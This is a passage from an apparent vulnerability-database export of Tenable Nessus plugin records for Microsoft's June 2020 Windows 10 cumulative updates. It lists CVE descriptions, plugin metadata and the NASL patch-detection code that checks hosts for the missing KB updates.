4561673 or cumulative update 4561666. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1269)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. 
An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. 
(CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. 
(CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
(CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. 
The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. 
There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. 
An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. 
The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\");\n # https://support.microsoft.com/en-us/help/4561649/windows-10-update-kb4561649\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?111cb6a4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561649.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561649'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561649])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:55", "description": "The remote Windows host is missing security update 4561616.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. 
(CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. 
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. 
The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. 
(CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. 
A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. 
(CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561616: Windows 10 Version 1607 and Windows Server 2016 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", 
"CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561616.NASL", "href": "https://www.tenable.com/plugins/nessus/137258", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137258);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n 
